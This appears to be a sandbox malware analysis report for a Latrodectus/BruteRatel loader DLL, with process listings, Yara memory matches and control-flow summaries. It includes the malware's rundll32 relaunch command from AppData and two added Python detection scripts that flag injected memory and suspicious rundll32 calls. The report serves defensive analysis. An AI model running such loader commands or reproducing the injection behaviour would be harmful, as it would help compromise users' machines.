                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Has exited:false

                                                                                                                    Target ID:20
                                                                                                                    Start time:00:04:08
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7272 -s 344
                                                                                                                    Imagebase:0x7ff67a3b0000
                                                                                                                    File size:570'736 bytes
                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:21
                                                                                                                    Start time:00:04:08
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7288 -s 344
                                                                                                                    Imagebase:0x7ff67a3b0000
                                                                                                                    File size:570'736 bytes
                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:22
                                                                                                                    Start time:00:04:16
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                    Imagebase:0x7ff72b770000
                                                                                                                    File size:5'141'208 bytes
                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Has exited:false
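The source names in the Yara match lists above encode where each dump came from, and that detail is what separates an injected payload from a module that merely sits on disk: every Latrodectus match in explorer.exe (Target ID 22) but one lands in private memory that is both writable and executable (protection 0x40 = PAGE_EXECUTE_READWRITE, type 0x20000 = MEM_PRIVATE), a combination a clean explorer.exe does not carry, whereas the rundll32 image region listed under "Memory Dump Source" further down is PAGE_EXECUTE_READ MEM_IMAGE. The parser below is an added example for this report, not part of Joe Sandbox or its tooling; the field layout of the .sdmp name is inferred from the names on this page and is an assumption, while the PAGE_* and MEM_* values are the documented winnt.h constants.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Memory protection constants from winnt.h (low byte of the protect field).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Region type constants from winnt.h (MEMORY_BASIC_INFORMATION.Type).
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMED field layout of a Joe Sandbox ".sdmp" source name, inferred from the
# names in this report rather than from vendor documentation:
#   <target id>.<phase>.<dump id>.<base address>.<protect>.<field 6>.<type>.<field 8>.sdmp
# Fields 6 and 8 are not interpreted here.
_DUMP_RE = re.compile(
    r"^([0-9a-f]{8})\.([0-9a-f]{8})\.([0-9a-f]+)\.([0-9a-f]{16})"
    r"\.([0-9a-f]{8})\.([0-9a-f]{8})\.([0-9a-f]{8})\.([0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    target_id: int   # same number as "Target ID" in the process list (hex in the name)
    phase: int       # assumed: 2 = end-of-analysis dump, 3 = dump taken during execution
    base: int        # region base address
    protect: int     # PAGE_* protection at dump time
    mem_type: int    # MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, hex(self.mem_type))

    @property
    def writable_executable(self) -> bool:
        # W+X pages: PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY
        return (self.protect & 0xFF) in (0x40, 0x80)


def parse_dump_name(name: str) -> DumpRegion:
    """Decode one .sdmp source name into its region attributes."""
    m = _DUMP_RE.match(name.strip())
    if m is None:
        raise ValueError(f"not a recognised sdmp name: {name!r}")
    target, phase, _dump_id, base, protect, _f6, mem_type, _f8 = m.groups()
    return DumpRegion(int(target, 16), int(phase, 16), int(base, 16),
                      int(protect, 16), int(mem_type, 16))


def injected_code_hits(hits: List[Tuple[str, str]]) -> List[Tuple[str, DumpRegion]]:
    """Keep Yara hits whose dump came from writable+executable private memory.

    A rule match on a MEM_IMAGE region is the on-disk module itself; a match on
    W+X MEM_PRIVATE memory inside a Windows binary such as explorer.exe is the
    footprint of code that was written into the process at run time.
    """
    out = []
    for rule, source in hits:
        region = parse_dump_name(source)
        if region.writable_executable and region.type_name == "MEM_PRIVATE":
            out.append((rule, region))
    return out


# The six Latrodectus matches listed for Target ID 22 (explorer.exe) above,
# copied from the report, plus the rundll32 image region listed under
# "Memory Dump Source" further down as a non-injected control case.
EXPLORER_HITS = [
    ("JoeSecurity_Latrodectus", "00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp"),
    ("JoeSecurity_Latrodectus", "00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp"),
    ("JoeSecurity_Latrodectus", "00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp"),
    ("JoeSecurity_Latrodectus", "00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp"),
    ("JoeSecurity_Latrodectus", "00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp"),
    ("JoeSecurity_Latrodectus", "00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp"),
]
IMAGE_REGION = "00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp"


if __name__ == "__main__":
    for rule, region in injected_code_hits(EXPLORER_HITS):
        print(f"target {region.target_id}: {rule} in {region.type_name} "
              f"{region.protect_name} @ {region.base:#x}")
```

Run over the six Target ID 22 matches it returns five W+X private regions and rejects the PAGE_READWRITE dump at 0x0B52C000 and the rundll32 image region, which is the split a triage script should make before anyone reads rule names: the W+X private hits are the ones worth dumping and comparing against the on-disk sample.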

                                                                                                                    Target ID:26
                                                                                                                    Start time:00:04:29
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:27
                                                                                                                    Start time:00:04:37
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true
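Target IDs 26 and 27 show the re-launch form of the loader: rundll32.exe invoking a copy of the sample from the user's AppData\Roaming directory with the export name stow. A detection has to split that command line the way rundll32 itself does (quoted or bare DLL path, comma, entry point, trailing arguments) before it can ask the only question that matters here, whether the DLL lives in a directory a standard user can write to. The code below is an added example for this report, not Joe Sandbox or Sigma code; the set of user-writable directories and the two benign comparison lines are constructed assumptions, while the first sample line is copied from the process list above.

```python
import ntpath
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Directories a standard user can write to (constructed list, extend to taste):
# a DLL handed to rundll32 from one of these is attacker-controlled code, not an
# OS component.
_USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+|programdata|windows\\temp|temp|tmp)\\", re.IGNORECASE
)


@dataclass
class Rundll32Call:
    exe: str
    dll: str
    entry: str
    args: str
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def _read_token(s: str, i: int) -> Tuple[str, int]:
    """Read one token at index i: a double-quoted string, or a run of characters
    up to whitespace or a comma. Returns (token, index after the token)."""
    n = len(s)
    while i < n and s[i].isspace():
        i += 1
    if i < n and s[i] == '"':
        j = s.find('"', i + 1)
        if j == -1:
            return s[i + 1:], n
        return s[i + 1:j], j + 1
    j = i
    while j < n and not s[j].isspace() and s[j] != ",":
        j += 1
    return s[i:j], j


def parse_rundll32(cmdline: str) -> Optional[Rundll32Call]:
    """Split a rundll32 command line into <dll>,<entry point> [args].

    Returns None when the image is not rundll32. Mirrors rundll32's own rule:
    the DLL is the first argument (quoted, or bare up to the first comma), the
    entry point follows the comma, and everything after the next whitespace is
    passed to the entry point as its argument string.
    """
    exe, i = _read_token(cmdline, 0)
    if ntpath.basename(exe).lower() not in ("rundll32.exe", "rundll32"):
        return None
    dll, i = _read_token(cmdline, i)
    n = len(cmdline)
    while i < n and cmdline[i].isspace():
        i += 1
    entry = ""
    if i < n and cmdline[i] == ",":
        entry, i = _read_token(cmdline, i + 1)
    call = Rundll32Call(exe, dll, entry, cmdline[i:].strip())

    if _USER_WRITABLE.search(dll):
        call.reasons.append("DLL loaded from a user-writable directory")
    if ntpath.splitext(dll)[1].lower() not in (".dll", ".cpl", ".ocx", ".ax"):
        call.reasons.append("DLL argument has a non-library extension")
    return call


def triage(cmdlines: List[str]) -> List[Rundll32Call]:
    """Return the rundll32 invocations in cmdlines that carry a reason to look closer."""
    found = []
    for line in cmdlines:
        call = parse_rundll32(line)
        if call is not None and call.suspicious:
            found.append(call)
    return found


# First line copied from Target IDs 26/27 above; the other two are constructed
# benign invocations used only for comparison.
SAMPLE_CMDLINES = [
    r'"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow',
    r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
    r'"C:\Windows\system32\rundll32.exe" "C:\Windows\System32\shell32.dll",#61 /s',
]


if __name__ == "__main__":
    for call in triage(SAMPLE_CMDLINES):
        print(f"{call.dll} -> {call.entry}: {'; '.join(call.reasons)}")
```

Only the AppData\Roaming line is returned; the two shell32.dll invocations, including the ordinal form, parse cleanly and stay quiet. The export name on its own is deliberately not a signal: a renamed sample gets a new export just as easily as a new file name, while the directory it is executed from is what the loader cannot change without elevated rights.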


                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:225
                                                                                                                      Total number of Limit Nodes:13
                                                                                                                      execution_graph: call graph of the DLL code in the 0x180000000 image range, 225 nodes (13 limit nodes), rendered as an interactive figure in the original report; the raw node and edge listing is not meaningful as text. What can be read from it: the graph consists almost entirely of MSVC C runtime startup and cleanup routines (_onexit, _set_errno_from_matherr, __std_exception_copy, _invalid_parameter_noinfo_noreturn, _purecall, _CxxThrowException, __scrt_uninitialize_crt, __scrt_initialize_onexit_tables, __FrameHandler3::UnwindNestedFrames, __InternalCxxFrameHandler, try_get_function, Concurrency::details::SchedulerProxy::DeleteThis), and the Windows APIs named in it are GetEnvironmentStringsW, FreeEnvironmentStringsW, WideCharToMultiByte, GetOEMCP, GetACP, IsValidCodePage, GetCPInfo, InitializeCriticalSectionEx, EnterCriticalSection, GetLastError, TlsGetValue, LoadLibraryExW, GetProcAddress and FreeLibrary. Read together with the 1.2% execution coverage above, the graph covers the loader's CRT initialisation, not the behaviour behind the Yara matches on in-memory dumps.

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 0x18000de90-0x18000e1be: 100 basic blocks (node ids 0-99) of the CRT DllMain dispatch routine, the function that calls the __scrt_dllmain_* helpers and re-enters itself at 0x18000de90 on the failure path. The executed/not-executed colouring and the edge list exist only in the interactive view. Named callees in the listing: __scrt_dllmain_crt_thread_attach, __scrt_dllmain_after_initialize_c, __scrt_dllmain_uninitialize_c, and internal routines at 0x18000dc18, 0x18000daac, 0x18000db5c, 0x18000db1c, 0x18000e470, 0x18000af30, 0x18000ddd8, 0x18000dd3c, 0x18000e678, 0x18000e6ec, 0x18000dc04, 0x18000ddfc, 0x18000e6b0, 0x18000e668, 0x18000e68c, 0x180015a38, 0x1800159d4 and 0x18000e6a8.
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_fastfail__scrt_release_startup_lock$__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_dllmain_uninitialize_c__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_uninitialize_crt
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 747939005-0
                                                                                                                      • Opcode ID: d7a072687d834e50c2146167156290bc02a786a46f41c0fae8196e1fdd9393dd
                                                                                                                      • Instruction ID: f1d8c7e15b6d0e8eee91dc52fcbb3e9c46995225e7eb304dce92d09e8cc04b6c
                                                                                                                      • Opcode Fuzzy Hash: d7a072687d834e50c2146167156290bc02a786a46f41c0fae8196e1fdd9393dd
                                                                                                                      • Instruction Fuzzy Hash: B791123161428D86FAD3EB66A8813EA77D1AB8E7C0F44C026BA4557796DF38CB4D8310

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 0x18000dc18-0x18000dc60: 7 basic blocks (node ids 102-113) calling 0x18000e200, 0x18000fb2c, 0x180015954 and 0x18000fb88; the executed/not-executed colouring and the edge list exist only in the interactive view.
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 722566019-0
                                                                                                                      • Opcode ID: 91b077c6b03f44861365230ed74371ec9b6e332527939ceb5f78727b5766cd1f
                                                                                                                      • Instruction ID: 37a4a6329ced6371a2a66ea28f6e1e4b09dc9fd3b3f75e0e34c4a6cc3791f04e
                                                                                                                      • Opcode Fuzzy Hash: 91b077c6b03f44861365230ed74371ec9b6e332527939ceb5f78727b5766cd1f
                                                                                                                      • Instruction Fuzzy Hash: 08E0DF3020528D81FEEBA67124227F93B800B5E3C0F00D09AB899422C3CE49478EEB30

Control-flow Graph (graph image not included; first basic block at 18001ddcc)
APIs
Memory Dump Source
• Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 76e772688924292ddc527cdee5a1c178fbb710bea3d58e257d819c99dcd316d4
• Instruction ID: 65d17c79e222b1a2ddf372d1d78ee9c6fe23a33d1381d1b4cca3fedefeeea444
• Opcode Fuzzy Hash: 76e772688924292ddc527cdee5a1c178fbb710bea3d58e257d819c99dcd316d4
• Instruction Fuzzy Hash: 2F119E32119B4C86F382AB14E4403D9B3A4F7987C0F058426F6554B792DF38DA18CB40

Control-flow Graph (graph image not included; first basic block at 180018d1c)
APIs
• RtlAllocateHeap.NTDLL(?,?,00000000,0000000180016B55,?,?,0000EABB3B49FBAC,0000000180011C25,?,?,?,?,0000000180016D36,?,?,00000000), ref: 0000000180018D71
Memory Dump Source
• Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: da620ac3b0470c3e284df06d5e3f72be40a4f5f84ded953bc3c8e14b1fd962ce
• Instruction ID: f62841dba19585218a950150cd799660ed1f7947fd5cd83960c79d349b7bd01d
• Opcode Fuzzy Hash: da620ac3b0470c3e284df06d5e3f72be40a4f5f84ded953bc3c8e14b1fd962ce
• Instruction Fuzzy Hash: DDF01774301F0C85FFEB57A6A8513E523946FADBC4F4CD424A90A8A6D2EE2CC7899310

Control-flow Graph (graph image not included; first basic block at 18000b992)
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: Close$InfoQuery
• String ID: APPID$CLSID\$OLEAUT32.DLL$RegisterTypeLibForUser$UnRegisterTypeLibForUser$\Implemented Categories${636e6d27-fcd4-4f50-9327-a57314f1dd57}
• API String ID: 852846383-4188877753
• Opcode ID: fbace4b01e39f4c152dc32fcbca2de49086262a6c9a615992fa1c11e5009fb91
• Instruction ID: 36fdccbf38cee0f485eeab3dfea302ae432b8954be7fefccb6c683304f628cc1
• Opcode Fuzzy Hash: fbace4b01e39f4c152dc32fcbca2de49086262a6c9a615992fa1c11e5009fb91
• Instruction Fuzzy Hash: 8FF17331705B4982EBA6DB65E4943EA73A1F78CBD4F548016FA8983B59DF78C64CCB00
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 808467561-2761157908
• Opcode ID: 8c05d314b1a74ba9b1eb68ae04c90fd85cbb0cde2249671c6c6cb671a958a776
• Instruction ID: e1f0dae4446f51bdafb8847fc3cb24afbbfbf491ddeddb96ede54685b1ef348e
• Opcode Fuzzy Hash: 8c05d314b1a74ba9b1eb68ae04c90fd85cbb0cde2249671c6c6cb671a958a776
• Instruction Fuzzy Hash: 79B2F472614A998BE7BACE69D440BED37A1F38C7C8F509116EA0657B84DF34CB48CB05

Control-flow Graph (graph image not included; first basic block at 18000c480)
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID: OfficeScan-%u-%u
• API String ID: 2063062207-1227074125
• Opcode ID: c6addf902dd7764679405b11add7e8d10a0e2cc93030d68895b140be5f5e4abf
• Instruction ID: bc3edd4260d23f08e391710098e1a743541aac0b446be91329466539f08d82ed
• Opcode Fuzzy Hash: c6addf902dd7764679405b11add7e8d10a0e2cc93030d68895b140be5f5e4abf
• Instruction Fuzzy Hash: A2E18B72710B988AEB51CB69E8447DD73A1FB88BD8F508216EA5D53B98DF78C648C700

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1165 180001950-180001a17 call 180001d50 * 2 1172 180001a1d-180001a24 1165->1172 1173 180001cbf-180001cc6 1165->1173 1172->1173 1176 180001a2a-180001ae6 GetCurrentProcessId GetCurrentThreadId call 1800085d0 call 18000acb0 call 18000d630 call 18000acb0 1172->1176 1174 180001cc8-180001ccd call 18000d628 1173->1174 1175 180001cce-180001cd5 1173->1175 1174->1175 1178 180001cd7 call 18000d628 1175->1178 1179 180001cdc-180001d05 call 18000da80 1175->1179 1192 180001ae8-180001afa call 1800085d0 1176->1192 1193 180001afb-180001afe 1176->1193 1178->1179 1192->1193 1195 180001b09-180001b11 1193->1195 1196 180001b00-180001b08 call 18000d628 1193->1196 1199 180001b13-180001b29 1195->1199 1200 180001b49-180001b8b CreateFileMappingW 1195->1200 1196->1195 1204 180001b44 call 18000d628 1199->1204 1205 180001b2b-180001b3e 1199->1205 1201 180001b91-180001bb2 MapViewOfFile 1200->1201 1202 180001c82-180001c8a 1200->1202 1208 180001c78-180001c81 CloseHandle 1201->1208 1209 180001bb8-180001bee call 18000f320 1201->1209 1202->1173 1210 180001c8c-180001ca2 1202->1210 1204->1200 1205->1204 1206 180001d0c-180001d11 call 180011aec 1205->1206 1222 180001d12-180001d20 call 180011aec 1206->1222 1208->1202 1220 180001bf0-180001bf8 1209->1220 1212 180001ca4-180001cb7 1210->1212 1213 180001cb9-180001cbe call 18000d628 1210->1213 1212->1213 1216 180001d06-180001d0b call 180011aec 1212->1216 1213->1173 1216->1206 1220->1220 1224 180001bfa-180001c34 call 1800085d0 call 180001e60 1220->1224 1231 180001c36-180001c4c 1224->1231 1232 180001c6c-180001c75 UnmapViewOfFile 1224->1232 1233 180001c67 call 18000d628 1231->1233 1234 180001c4e-180001c61 1231->1234 1232->1208 1233->1232 1234->1222 1234->1233
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$File$CurrentView$CloseCreateHandleMappingProcessThreadUnmap
                                                                                                                      • String ID: AmsiScan-%u-%u
                                                                                                                      • API String ID: 339449336-3663814587

                                                                                                                      Control-flow Graph
